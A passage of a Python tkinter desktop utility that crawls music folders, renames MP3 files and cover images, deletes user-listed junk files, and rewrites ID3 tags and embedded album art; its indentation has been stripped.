'Invoke', 'Levy', 'Likewise', 'Nonetheless', 'Notwithstanding', 'Odd', 'Ongoing', 'Panel', 'Persist', 'Pose', 'Reluctance', 'So-called', 'Straightforward', 'Undergo', 'Whereby']
B=['for', 'and', 'nor', 'but', 'or', 'yet', 'so']
C=['Agastopia', 'Argle-bargle', 'Bibble', 'Billingsgate', 'Blatherskite', 'Bobsy-die', 'Borborygmus', 'Bumfuzzle', 'Cabotage', 'Cacophony', 'Cattywampus', 'Collywobbles', 'Conjubilant', 'Curmudgeon', 'Doodle Sack', 'Discombobulate', 'Deipnophobia', 'Dipthong', 'Donkey Engine', 'Dragoman', 'Erf', 'Erinaceous', 'Finifugal', 'Fipple', 'Firman', 'Flummox', 'Frankenfood', 'Fudgel', 'Funambulist', 'Futz', 'Gabelle', 'Gardyloo', 'Gibberish', 'Gobbledygook', 'Groke', 'Grommet', 'Gubbins', 'Halfpace', 'Hullaballoo', 'Ill-willie', 'Impignorate', 'Jentacular', 'Kakorrhaphiophobia', 'Kerfuffle', 'Lackadaisical', 'Lamprophony', 'Lollygag', 'Macrosmatic', 'Meldrop', 'Nudiustertian', 'Obelus', 'Octothorpe', 'Oxter', 'Pauciloquent', 'Poppycock', 'Quire', 'Quomodocunquizing', 'Ragamuffin', 'Ratoon', 'Salopettes', 'Smicker', 'Snickersnee', 'Sprunt', 'Taradiddle', 'Tittynope', 'Ulotrichous', 'Valetudinarian', 'Whiffler', 'Whippersnapper', 'Widdershins', 'Woebegone', 'Winklepicker', 'Xertz', 'Yarborough', 'Zoanthropy']
cd=random.choice([1,2])
for t in range(cd):
temp+=random.choice(A)+' '
temp+=random.choice(B)+' '
temp+=random.choice(C)+' '
temp=temp.strip()
else: # For missing album.
A=['Michael', 'Christopher', 'Jessica', 'Matthew', 'Ashley', 'Jennifer', 'Joshua', 'Amanda', 'Daniel', 'David', 'James', 'Robert', 'John', 'Joseph', 'Andrew', 'Ryan', 'Brandon', 'Jason', 'Justin', 'Sarah', 'William', 'Jonathan', 'Stephanie', 'Brian', 'Nicole', 'Nicholas', 'Anthony', 'Heather', 'Eric', 'Elizabeth', 'Adam', 'Megan', 'Melissa', 'Kevin', 'Steven', 'Thomas', 'Timothy', 'Christina', 'Kyle', 'Rachel', 'Laura', 'Lauren', 'Amber', 'Brittany', 'Danielle', 'Richard', 'Kimberly', 'Jeffrey', 'Amy', 'Crystal', 'Michelle', 'Tiffany', 'Jeremy', 'Benjamin', 'Mark', 'Emily', 'Aaron', 'Charles', 'Rebecca', 'Jacob', 'Stephen', 'Patrick', 'Sean', 'Erin', 'Zachary', 'Jamie', 'Kelly', 'Samantha', 'Nathan', 'Sara', 'Dustin', 'Paul', 'Angela', 'Tyler', 'Scott', 'Katherine', 'Andrea', 'Gregory', 'Erica', 'Mary', 'Travis', 'Lisa', 'Kenneth', 'Bryan', 'Lindsey', 'Kristen', 'Jose', 'Alexander', 'Jesse', 'Katie', 'Lindsay', 'Shannon', 'Vanessa', 'Courtney', 'Christine', 'Alicia', 'Cody', 'Allison', 'Bradley', 'Samuel', 'Shawn', 'April', 'Derek', 'Kathryn', 'Kristin', 'Chad', 'Jenna', 'Tara', 'Maria', 'Krystal', 'Jared', 'Anna', 'Edward', 'Julie', 'Peter', 'Holly', 'Marcus', 'Kristina', 'Natalie', 'Jordan', 'Victoria', 'Jacqueline', 'Corey', 'Keith', 'Monica', 'Juan', 'Donald', 'Cassandra', 'Meghan', 'Joel', 'Shane', 'Phillip', 'Patricia', 'Brett', 'Ronald', 'Catherine', 'George', 'Antonio', 'Cynthia', 'Stacy', 'Kathleen', 'Raymond', 'Carlos', 'Brandi', 'Douglas', 'Nathaniel', 'Ian', 'Craig', 'Brandy', 'Alex', 'Valerie', 'Veronica', 'Cory', 'Whitney', 'Gary', 'Derrick', 'Philip', 'Luis', 'Diana', 'Chelsea', 'Leslie', 'Caitlin', 'Leah', 'Natasha', 'Erika', 'Casey', 'Latoya', 'Erik', 'Dana', 'Victor', 'Brent', 'Dominique', 'Frank', 'Brittney', 'Evan', 'Gabriel', 'Julia', 'Candice', 'Karen', 'Melanie', 'Adrian', 'Stacey', 'Margaret', 'Sheena', 'Wesley', 'Vincent', 'Alexandra', 'Katrina', 'Bethany', 'Nichole', 'Larry', 'Jeffery', 'Curtis', 'Carrie', 'Todd', 'Blake', 'Christian', 'Randy', 'Dennis', 'Alison', 'Trevor', 'Seth', 'Kara', 'Joanna', 'Rachael', 'Luke', 'Felicia', 'Brooke', 'Austin', 'Candace', 'Jasmine', 'Jesus', 'Alan', 'Susan', 'Sandra', 'Tracy', 'Kayla', 'Nancy', 'Tina', 'Krystle', 'Russell', 'Jeremiah', 'Carl', 'Miguel', 'Tony', 'Alexis', 'Gina', 'Jillian', 'Pamela', 'Mitchell', 'Hannah', 'Renee', 'Denise', 'Molly', 'Jerry', 'Misty', 'Mario', 'Johnathan', 'Jaclyn', 'Brenda', 'Terry', 'Lacey', 'Shaun', 'Devin', 'Heidi', 'Troy', 'Lucas', 'Desiree', 'Jorge', 'Andre', 'Morgan', 'Drew', 'Sabrina', 'Miranda', 'Alyssa', 'Alisha', 'Teresa', 'Johnny', 'Meagan', 'Allen', 'Krista', 'Marc', 'Tabitha', 'Lance', 'Ricardo', 'Martin', 'Chase', 'Theresa', 'Melinda', 'Monique', 'Tanya', 'Linda', 'Kristopher', 'Bobby', 'Caleb', 'Ashlee', 'Kelli', 'Henry', 'Garrett', 'Mallory', 'Jill', 'Jonathon', 'Kristy', 'Anne', 'Francisco', 'Danny', 'Robin', 'Lee', 'Tamara', 'Manuel', 'Meredith', 'Colleen', 'Lawrence', 'Christy', 'Ricky', 'Randall', 'Marissa', 'Ross', 'Mathew', 'Jimmy', 'Abigail', 'Kendra', 'Carolyn', 'Billy', 'Deanna', 'Jenny', 'Jon', 'Albert', 'Taylor', 'Lori', 'Rebekah', 'Cameron', 'Ebony', 'Wendy', 'Angel', 'Micheal', 'Kristi', 'Caroline', 'Colin', 'Dawn', 'Kari', 'Clayton', 'Arthur', 'Roger', 'Roberto', 'Priscilla', 'Darren', 'Kelsey', 'Clinton', 'Walter', 'Louis', 'Barbara', 'Isaac', 'Cassie', 'Grant', 'Cristina', 'Tonya', 'Rodney', 'Bridget', 'Joe', 'Cindy', 'Oscar', 'Willie', 'Maurice', 'Jaime', 'Angelica', 'Sharon', 'Julian', 'Jack', 'Jay', 'Calvin', 'Marie', 'Hector', 'Kate', 'Adrienne', 'Tasha', 'Michele', 'Ana', 'Stefanie', 'Cara', 'Alejandro', 'Ruben', 'Gerald', 'Audrey', 'Kristine', 'Ann', 'Shana', 'Javier', 'Katelyn', 'Brianna', 'Bruce', 'Deborah', 'Claudia', 'Carla', 'Wayne', 'Roy', 'Virginia', 'Haley', 'Brendan', 'Janelle', 'Jacquelyn', 'Beth', 'Edwin', 'Dylan', 'Dominic', 'Latasha', 'Darrell', 'Geoffrey', 'Savannah', 'Reginald', 'Carly', 'Fernando', 'Ashleigh', 'Aimee', 'Regina', 'Mandy', 'Sergio', 'Rafael', 'Pedro', 'Janet', 'Kaitlin', 'Frederick', 'Cheryl', 'Autumn', 'Tyrone', 'Martha', 'Omar', 'Lydia', 'Jerome', 'Theodore', 'Abby', 'Neil', 'Shawna', 'Sierra', 'Nina', 'Tammy', 'Nikki', 'Terrance', 'Donna', 'Claire', 'Cole', 'Trisha', 'Bonnie', 'Diane', 'Summer', 'Carmen', 'Mayra', 'Jermaine', 'Eddie', 'Micah', 'Marvin', 'Levi', 'Emmanuel', 'Brad', 'Taryn', 'Toni', 'Jessie', 'Evelyn', 'Darryl', 'Ronnie', 'Joy', 'Adriana', 'Ruth', 'Mindy', 'Spencer', 'Noah', 'Raul', 'Suzanne', 'Sophia', 'Dale', 'Jodi', 'Christie', 'Raquel', 'Naomi', 'Kellie', 'Ernest', 'Jake', 'Grace', 'Tristan', 'Shanna', 'Hilary', 'Eduardo', 'Ivan', 'Hillary', 'Yolanda', 'Alberto', 'Andres', 'Olivia', 'Armando', 'Paula', 'Amelia', 'Sheila', 'Rosa', 'Robyn', 'Kurt', 'Dane', 'Glenn', 'Nicolas', 'Gloria', 'Eugene', 'Logan', 'Steve', 'Ramon', 'Bryce', 'Tommy', 'Preston', 'Keri', 'Devon', 'Alana', 'Marisa', 'Melody', 'Rose', 'Barry', 'Marco', 'Karl', 'Daisy', 'Leonard', 'Randi', 'Maggie', 'Charlotte', 'Emma', 'Terrence', 'Justine', 'Britney', 'Lacy', 'Jeanette', 'Francis', 'Tyson', 'Elise', 'Sylvia', 'Rachelle', 'Stanley', 'Debra', 'Brady', 'Charity', 'Hope', 'Melvin', 'Johanna', 'Karla', 'Jarrod', 'Charlene', 'Gabrielle', 'Cesar', 'Clifford', 'Byron', 'Terrell', 'Sonia', 'Julio', 'Stacie', 'Shelby', 'Shelly', 'Edgar', 'Roxanne', 'Dwayne', 'Kaitlyn', 'Kasey', 'Jocelyn', 'Alexandria', 'Harold', 'Esther', 'Kerri', 'Ellen', 'Abraham', 'Cedric', 'Carol', 'Katharine', 'Shauna', 'Frances', 'Antoine', 'Tabatha', 'Annie', 'Erick', 'Alissa', 'Sherry', 'Chelsey', 'Franklin', 'Branden', 'Helen', 'Traci', 'Lorenzo', 'Dean', 'Sonya', 'Briana', 'Angelina', 'Trista', 'Bianca', 'Leticia', 'Tia', 'Kristie', 'Stuart', 'Laurie', 'Harry', 'Leigh', 'Elisabeth', 'Alfredo', 'Aubrey', 'Ray', 'Arturo', 'Joey', 'Kelley', 'Max', 'Andy', 'Latisha', 'Johnathon', 'India', 'Eva', 'Ralph', 'Yvonne', 'Warren', 'Kirsten', 'Miriam', 'Kelvin', 'Lorena', 'Staci', 'Anita', 'Rene', 'Cortney', 'Orlando', 'Carissa', 'Jade', 'Camille', 'Leon', 'Paige', 'Marcos', 'Elena', 'Brianne', 'Dorothy', 'Marshall', 'Daryl', 'Colby', 'Terri', 'Gabriela', 'Brock', 'Gerardo', 'Jane', 'Nelson', 'Tamika', 'Alvin', 'Chasity', 'Trent', 'Jana', 'Enrique', 'Tracey', 'Antoinette', 'Jami', 'Earl', 'Gilbert', 'Damien', 'Janice', 'Christa', 'Tessa', 'Kirk', 'Yvette', 'Elijah', 'Howard', 'Elisa', 'Desmond', 'Clarence', 'Alfred', 'Darnell', 'Breanna', 'Kerry', 'Nickolas', 'Maureen', 'Karina', 'Roderick', 'Rochelle', 'Rhonda', 'Keisha', 'Irene', 'Ethan', 'Alice', 'Allyson', 'Hayley', 'Trenton', 'Beau', 'Elaine', 'Demetrius', 'Cecilia', 'Annette', 'Brandie', 'Katy', 'Tricia', 'Bernard', 'Wade', 'Chance', 'Bryant', 'Zachery', 'Clifton', 'Julianne', 'Angelo', 'Elyse', 'Lyndsey', 'Clarissa', 'Meaghan', 'Tanisha', 'Ernesto', 'Isaiah', 'Xavier', 'Clint', 'Jamal', 'Kathy', 'Salvador', 'Jena', 'Marisol', 'Darius', 'Guadalupe', 'Chris', 'Patrice', 'Jenifer', 'Lynn', 'Landon', 'Brenton', 'Sandy', 'Jasmin', 'Ariel', 'Sasha', 'Juanita', 'Israel', 'Ericka', 'Quentin', 'Jayme', 'Damon', 'Heath', 'Kira', 'Ruby', 'Rita', 'Tiara', 'Jackie', 'Jennie', 'Collin', 'Lakeisha', 'Kenny', 'Norman', 'Leanne', 'Hollie', 'Destiny', 'Shelley', 'Amie', 'Callie', 'Hunter', 'Duane', 'Sally', 'Serena', 'Lesley', 'Connie', 'Dallas', 'Simon', 'Neal', 'Laurel', 'Eileen', 'Lewis', 'Bobbie', 'Faith', 'Brittani', 'Shayla', 'Eli', 'Judith', 'Terence', 'Ciara', 'Charlie', 'Alyson', 'Vernon', 'Alma', 'Quinton', 'Nora', 'Lillian', 'Leroy', 'Joyce', 'Chrystal', 'Marquita', 'Lamar', 'Ashlie', 'Kent', 'Emanuel', 'Joanne', 'Gavin', 'Yesenia', 'Perry', 'Marilyn', 'Graham', 'Constance', 'Lena', 'Allan', 'Juliana', 'Jayson', 'Shari', 'Nadia', 'Tanner', 'Isabel', 'Becky', 'Rudy', 'Blair', 'Christen', 'Rosemary', 'Marlon', 'Glen', 'Genevieve', 'Damian', 'Michaela', 'Shayna', 'Marquis', 'Fredrick', 'Celeste', 'Bret', 'Betty', 'Kurtis', 'Rickey', 'Dwight', 'Rory', 'Mia', 'Josiah', 'Norma', 'Bridgette', 'Shirley', 'Sherri', 'Noelle', 'Chantel', 'Alisa', 'Zachariah', 'Jody', 'Christin', 'Julius', 'Gordon', 'Latonya', 'Lara', 'Lucy', 'Jarrett', 'Elisha', 'Deandre', 'Audra', 'Beverly', 'Felix', 'Alejandra', 'Nolan', 'Tiffani', 'Lonnie', 'Don', 'Darlene', 'Rodolfo', 'Terra', 'Sheri', 'Iris', 'Maxwell']
cd=random.choice([2,3])
for t in range(cd):
temp+=random.choice(A)+' '
temp=temp.strip()
red2.insert('1.0',temp)
ax = tkinter.Button(roota,text ="Generate Random",command=randoM, anchor='c',font=('Helvetica', 14, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099')
ax.pack()
ax.place(bordermode=OUTSIDE, height=50, width=300,relx=0.0, rely=0.875, anchor=SW)
ax2 = tkinter.Button(roota,text ="Clear Text Box",command=clara, anchor='c',font=('Helvetica', 14, 'bold'),bg='#000099',fg='#00ffff',activebackground='#00ffff',activeforeground='#000099')
ax2.pack()
ax2.place(bordermode=OUTSIDE, height=50, width=300,relx=0.0, rely=0.75, anchor=SW)
def jan(k):
if jig.fig:
red2.delete('1.0', END)
jig.fig=False
red2.bind('<Button-1>',jan)
red2.bind('<Button-2>',jan)
red2.bind('<Button-3>',jan)
class aloe:
vera=True
def quitt2():
yum=red2.get('1.0',END)
if yum.replace(' ','').replace('\n','').replace('\t','')=='' or yum.replace(' ','').replace('\n','').replace('\t','')=='TypeAlbumNameHere':
acv.config(text='No Text: Click Again To Skip',font=('Helvetica', 13, 'bold'))
if aloe.vera==False:
taffy.dataToReturn=None
roota.destroy()
return
aloe.vera=False
else:
taffy.dataToReturn=yum.replace('\n','').replace('\t','').strip()
roota.destroy()
acv.config(command=quitt2)
roota.mainloop()
def masterLoop(path):
ram.files=0
def crawler(path): # This will be called recursively to handle sub folders.
if ram.KillThread:
ravage()
return
if os.path.isdir(path)==False:
return
files=os.listdir(path)
if files==[]:
return
glu=False
if ram.FilesToDelete != None:
for t in files:
if t.lower() in ram.FilesToDelete:
try:
os.remove(path+'/'+t)
glu=True
except:
print('Deletion of ',path+'/'+t,' Failed!')
if glu:
files=os.listdir(path)
if files==[]:
return
dirTree.A=path
files.sort()
trx=True
mp3s=[]
covers=[]
for t in files:
if ram.KillThread:
ravage()
return
try:
if t.lower().endswith('.mp3'):
trx=False
mp3s.append(t)
else:
if t.lower().endswith('.jpg') or t.lower().endswith('.jpeg'):
covers.append(t)
except:
pass
if os.path.isdir(path+'/'+t):
try:
crawler(path+'/'+t) # This specifies recursive sub folder calls.
except:
pass
if trx or mp3s==[]:
return
cover=None
cola=False
if covers==[]: # This will try to extract album art from mp3s.
cola=True
else: # This will try to find cover as preferable, but use any image file as cover.
cam=True
if ram.CoversToSearchFor!=None:
for t in covers:
if t.lower() in ram.CoversToSearchFor:
cover=path+'/'+t
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('cover'):
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('folder'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('art'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('album'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('front'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cam:
for t in covers:
if t.lower().startswith('back'):
try:
os.rename(path+'/'+t,path+'/'+'cover.jpg')
if os.path.isfile(path+'/'+'cover.jpg'):
cover=path+'/cover.jpg'
else:
cover=path+'/'+t
except:
cover=path+'/'+t
cam=False
break
if cover==None:
cover=path+'/'+covers[0]
albums=[]
data=[] # Meaning Filenames.
artists=[]
for t in mp3s:
if ram.KillThread:
ravage()
return
aus=eyed3.load(path+'/'+t)
alb=str(aus.tag.album)
if alb in albums:
c=albums.index(alb)
data[c].append(t)
artists[c].append(str(aus.tag.artist))
else:
albums.append(alb)
data.append([t])
artists.append([aus.tag.artist])
c=0
for t in data:
data[c].sort()
c+=1
if len(albums)==[]:
return
if len(albums)!=1:
thebes=True
else:
thebes=False
c=0
newFnames=[]
for t in data:
if ram.KillThread:
ravage()
return
egypt=t
egypt.sort()
if egypt==[]:
print('Error: Nimue')
ram.LiveFeedback='Error: Nimue'
return
faith=reno(egypt)
cv=0
for b in egypt:
os.rename(path+'/'+b,path+'/'+faith[cv])
if os.path.isfile(path+'/'+faith[cv]) == False:
print('Issue H2O',path+'/'+faith[cv])
ram.LiveFeedback=str('Issue H2O',path+'/'+faith[cv])
return
cv+=1
newFnames.append(faith)
c=0
if ram.NotifyMissingAlbumName:
for t in albums:
if t=='None' or t==None:
handler([artists[c][0],'\n'.join(data[c])],'name')
gdi=taffy.dataToReturn
if gdi==None or gdi=='' or gdi=='None':
pass
else:
albums[c]=str(gdi)
c+=1
c=0
if ram.NotifyMissingArtist:
for t in artists:
check=True
for v in t:
if v!='None' and v!= None:
check=False
if check:
handler([albums[c],'\n'.join(data[c])],'artist')
gdi=taffy.dataToReturn
if gdi==None or gdi=='' or gdi=='None':
pass
else:
artists[c]=[str(gdi)]
c+=1
c=0
for t in newFnames:
if ram.KillThread:
ravage()
return
found=None # Will hold album cover path
addCover=True # This will determine if cover was found or not.
if thebes: # This means more than one album, so individual covers must be extracted.
for v in t:
try:
tag = TinyTag.get(path+'/'+v,image=True)
photor=tag.get_image()
if photor == '' or photor == None or len(photor) < 10:
found=None
else:
found=photor
break
except:
found=None
if found==None and ram.NotifyMissingCover: # This should call the missing data setter if checked.
dirTree.A=str(path)
handler([albums[c],artists[c][0],'\n'.join(t)],'cover')
found=taffy.dataToReturn
else:
try:
if ram.KeepBackup:
grey=open(path+'/'+'cover.jpg','wb')
grey.write(found)
grey.close()
found=path+'/'+'cover.jpg'
else:
found=None
except:
found=None
if os.path.isfile(str(found)):
try:
if ram.KeepBackup:
im = Image.open(found)
im.save(path+'/'+'cover.jpg','JPEG')
addCover=True
else:
found=None
addCover=False
except:
addCover=False
else:
addCover=False
else: # This is for singular albums.
if cover==None or os.path.isfile(cover)==False:
for v in t:
try:
tag = TinyTag.get(path+'/'+v,image=True)
photor=tag.get_image()
if photor == '' or photor == None or len(photor) < 10:
found=None
else:
found=photor
break
except:
found=None
if found==None and ram.NotifyMissingCover: # This should call the missing data setter if checked.
handler([albums[c],artists[c][0],'\n'.join(t)],'cover')
found=taffy.dataToReturn
else:
try:
if ram.KeepBackup:
grey=open(path+'/'+'cover.jpg','wb')
grey.write(found)
grey.close()
found=path+'/'+'cover.jpg'
else:
pass
except:
found=None
if os.path.isfile(str(found)):
try:
if ram.KeepBackup:
im = Image.open(found)
im.save(path+'/'+'cover.jpg','JPEG')
addCover=True
else:
addCover=True
except:
addCover=False
else:
addCover=False
else:
found=cover
addCover=True
''' < This should set the new Data > '''
trackC=1 # Track count.
inhibit=None
debt=True
if found != None and os.path.isfile(found):
if ram.DontResiveJPG:
try:
if ram.KeepBackup:
im = Image.open(found)
size = ram.ResizeAlbumCoverSize
im.thumbnail(size, Image.ANTIALIAS)
im.save(found,'JPEG')
else:
pass
except:
print('Turbin Error')
ram.LiveFeedback='Turbin Error'
found=None
class coo:
imagedata=None
for F in t: # F == filename.
if ram.KillThread:
ravage()
return
try:
aus=eyed3.load(path+'/'+F)
if ram.DeleteEmbedded:
try:
for t in [y.description for y in aus.tag.images]:
aus.tag.images.remove(t)
except:
print('Cola Error')
ram.LiveFeedback='Cola Error'
if addCover and ram.WillEmbedArt: # For cover.
try:
if debt:
debt=False
try:
if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
os.remove(ex.tide+'/'+'temp-vox.jpg')
except:
print('Erra Prince')
ram.LiveFeedback='Erra Prince'
inhibit=str(albums[c])
im = Image.open(found)
size = ram.ResizeAlbumCoverSize
im.thumbnail(size, Image.ANTIALIAS)
im.save(ex.tide+'/'+'temp-vox.jpg','JPEG')
coo.imagedata = open(ex.tide+'/'+'temp-vox.jpg',"rb").read()
if inhibit == str(albums[c]):
for t in [y.description for y in aus.tag.images]:
aus.tag.images.remove(t)
aus.tag.images.set(3,coo.imagedata,"image/jpeg")
else:
try:
if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
os.remove(ex.tide+'/'+'temp-vox.jpg')
except:
print('Erra Prince2')
ram.LiveFeedback='Erra Prince2'
inhibit=str(albums[c])
im = Image.open(found)
size = ram.ResizeAlbumCoverSize
im.thumbnail(size, Image.ANTIALIAS)
im.save(ex.tide+'/'+'temp-vox.jpg','JPEG')
coo.imagedata = open(ex.tide+'/'+'temp-vox.jpg',"rb").read()
for t in [y.description for y in aus.tag.images]:
aus.tag.images.remove(t)
aus.tag.images.set(3,coo.imagedata,"image/jpeg")
except:
print('Erra: JING')
ram.LiveFeedback='Erra: JING'
aus.tag.album=str(albums[c])
ram.LiveFeedback='Processing Album: '+str(albums[c])
if ram.KillThread:
ravage()
return
try:
if artists[c][0]=='None' or artists[c][0]==None or artists[c][0]=='':
aus.tag.comments.set(str(albums[c]))
else:
aus.tag.comments.set(str(artists[c][0]))
except:
print('Erra Mohigo')
ram.LiveFeedback='Erra Mohigo'
if str(aus.tag.artist)=='None' or str(aus.tag.artist)=='':
vin = 'None'
for k in artists[c]:
if k=='None' or k=='' or k==None:
pass
else:
vin=str(k)
break
try:
aus.tag.album_artist=vin
aus.tag.artist=vin
aus.tag.composer=vin
aus.tag.original_artist=vin
aus.tag.publisher=vin
aus.tag.copyright=vin
except:
print('Erra kiosk')
ram.LiveFeedback='Erra Kiosk'
else:
vin = 'None'
for k in artists[c]:
if k=='None' or k=='' or k==None:
pass
else:
vin=str(k)
break
try:
aus.tag.publisher=vin
aus.tag.copyright=vin
except:
print('Erra vinmo')
ram.LiveFeedback='Erra vinmo'
if ram.ChangeAllGenres:
try:
aus.tag.genre=str(ram.GenreToChangeTo)
aus.tag.non_std_genre=str(ram.GenreToChangeTo)
except:
print('Erra halo')
ram.LiveFeedback='Erra halo'
aus.tag.track_num = trackC
trackC+=1
aus.tag.save()
ram.files+=1
except:
print('Erra Shim')
ram.LiveFeedback='Erra Shim'
c+=1 # This must go to end of this for loop.
try:
crawler(path) # This always at end of masterLoop(). Above return statement.
except:
ram.LiveFeedback='Done! Due to an Error or Bad Folder Path.'
try:
if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
os.remove(ex.tide+'/'+'temp-vox.jpg')
except:
print('Erra Prince5')
return
ram.LiveFeedback='Done! Processed '+str(ram.files)+' mp3s.'
try:
if os.path.isfile(ex.tide+'/'+'temp-vox.jpg'):
os.remove(ex.tide+'/'+'temp-vox.jpg')
except:
print('Erra Prince')
return
class vera:
a=None
def callMaster():
masterLoop(vera.a)
class dome:
x=None # dome.x
def multiplex():
class nim:
ue=None
nim.ue=tkinter.Tk()
root=nim.ue
background_image2=tkinter.PhotoImage(data = img.D)
root.iconphoto(False, background_image2)
class hepa:
a=True
def van():
rootx=Toplevel(nim.ue)
background_image3=tkinter.PhotoImage(data = img.D)
rootx.iconphoto(False, background_image3)
def fum():
hepa.a=True
rootx.destroy()
rootx.protocol('WM_DELETE_WINDOW', fum)
rootx.title('Alert!')
w = 150
h = 100
ws = rootx.winfo_screenwidth()
hs = rootx.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
rootx.geometry('%dx%d+%d+%d' % (w, h, x, y))
rootx.resizable(0, 0)
rootx.configure(background='#0066ff')
def knox():
rootx.destroy()
ram.KillThread=True
time.sleep(1)
root.destroy()
hepa.a=True
mainCat('Ended Processing Early Per User Request!')
cy = tkinter.Button(rootx,text ="Yes",command=knox,anchor='c',font=('Helvetica', 12, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
cy.pack()
cy.place(bordermode=OUTSIDE, height=25, width=75,relx=0.5, rely=1.0, anchor=SE)
def cruella():
rootx.destroy()
hepa.a=True
cy2 = tkinter.Button(rootx,text ="No",command=cruella,anchor='c',font=('Helvetica', 12, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
cy2.pack()
cy2.place(bordermode=OUTSIDE, height=25, width=75,relx=1, rely=1.0, anchor=SE)
at4 = Label(rootx,wraplength=150, fg='black',bg='#0066ff',text='Stop Running Processes?',justify=LEFT,font=('Helvetica', 14, 'bold'))
at4.place(bordermode=OUTSIDE,height=75, width=600,relx=0.5, rely=0.0, anchor=N)
rootx.mainloop()
def zayu():
if hepa.a:
hepa.a=False
van()
root.protocol('WM_DELETE_WINDOW', van)
def upS():
if ram.LiveFeedback.startswith('Done!'):
try:
rootx.destroy()
except:
pass
root.destroy()
dome.x.join()
mainCat(ram.LiveFeedback)
return
d.config(text=ram.LiveFeedback)
root.after(3000,upS)
def mecca():
ram.LiveFeedback='Initializing!'
dome.x = threading.Thread(target=callMaster)
dome.x.start()
upS()
root.title('Processing Files.')
w = 600
h = 100
ws = root.winfo_screenwidth()
hs = root.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.resizable(0, 0)
root.configure(background='#000099')
backg=tkinter.PhotoImage(data = img.C)
at = Label(root, bg='#2d00b3',image=backg)
at.place(bordermode=OUTSIDE,height=70, width=600,relx=0, rely=0.0, anchor=NW)
d = Label(root, text='Initializing.',anchor='w',relief=SUNKEN,fg='black',bg='cyan',highlightbackground="#000066", highlightcolor="#0000ff", highlightthickness=4,font=('Helvetica', 13,'bold'))
d.place(bordermode=OUTSIDE, height=30, width=600,relx=0.5, rely=1, anchor=S)
root.after(100,mecca)
root.mainloop()
def colaC(temp):
vera.a=temp
multiplex()
class nim:
indo=None # nim.indo
rt=None # nim.rt
def settings():
ram.coffee=True
ram.rt=Toplevel(nim.rt)
def vine():
ram.rt.destroy()
ram.coffee=None
nim.indo.config(text='Settings closed; no settings saved.')
ram.rt.protocol('WM_DELETE_WINDOW', vine)
ram.rt.title('Settings')
w = 600
h = 400
ws = ram.rt.winfo_screenwidth()
hs = ram.rt.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
ram.rt.geometry('%dx%d+%d+%d' % (w, h, x, y))
ram.rt.resizable(0, 0)
ram.rt.configure(background='#0066ff')
bw = tkinter.Text(ram.rt,relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12),insertbackground='#000066')
bw.pack()
bw.place(bordermode=OUTSIDE, height=100, width=600,relx=0, rely=0.20, anchor=NW)
class nuw:
nu=True
class nuw2:
nu=True
if ram.CoversToSearchFor==None or ram.CoversToSearchFor=='' or ram.CoversToSearchFor==[]:
bw.insert("1.0", "Cover.jpg\nFolder.jpeg\nArt.jpg")
else:
bw.insert("1.0",'\n'.join(ram.CoversToSearchFor))
nuw.nu=False
def mp2(cdf):
if nuw.nu:
nuw.nu=False
bw.delete('1.0',END)
bw.bind('<Button-1>',mp2)
bw.bind('<Button-2>',mp2)
bw.bind('<Button-3>',mp2)
bw2 = tkinter.Text(ram.rt,relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12),insertbackground='#000066')
bw2.pack()
bw2.place(bordermode=OUTSIDE, height=100, width=600,relx=0, rely=0.65, anchor=NW)
if ram.FilesToDelete==None or ram.FilesToDelete=='' or ram.FilesToDelete==[]:
bw2.insert("1.0", "Example.txt\nJunk.jpg\nUnused File.dat\nGarbage.file")
else:
bw2.insert("1.0",'\n'.join(ram.FilesToDelete))
nuw2.nu=False
def mp22(cdf):
if nuw2.nu:
nuw2.nu=False
bw2.delete('1.0',END)
bw2.bind('<Button-1>',mp22)
bw2.bind('<Button-2>',mp22)
bw2.bind('<Button-3>',mp22)
a23 = Label(ram.rt, fg='cyan',bg='#290066',text='Album Cover Names.',wraplength=130,font=('Helvetica', 14, 'bold'),justify=LEFT)
a23.place(bordermode=OUTSIDE,height=80, width=130,relx=0.0, rely=0.0, anchor=NW)
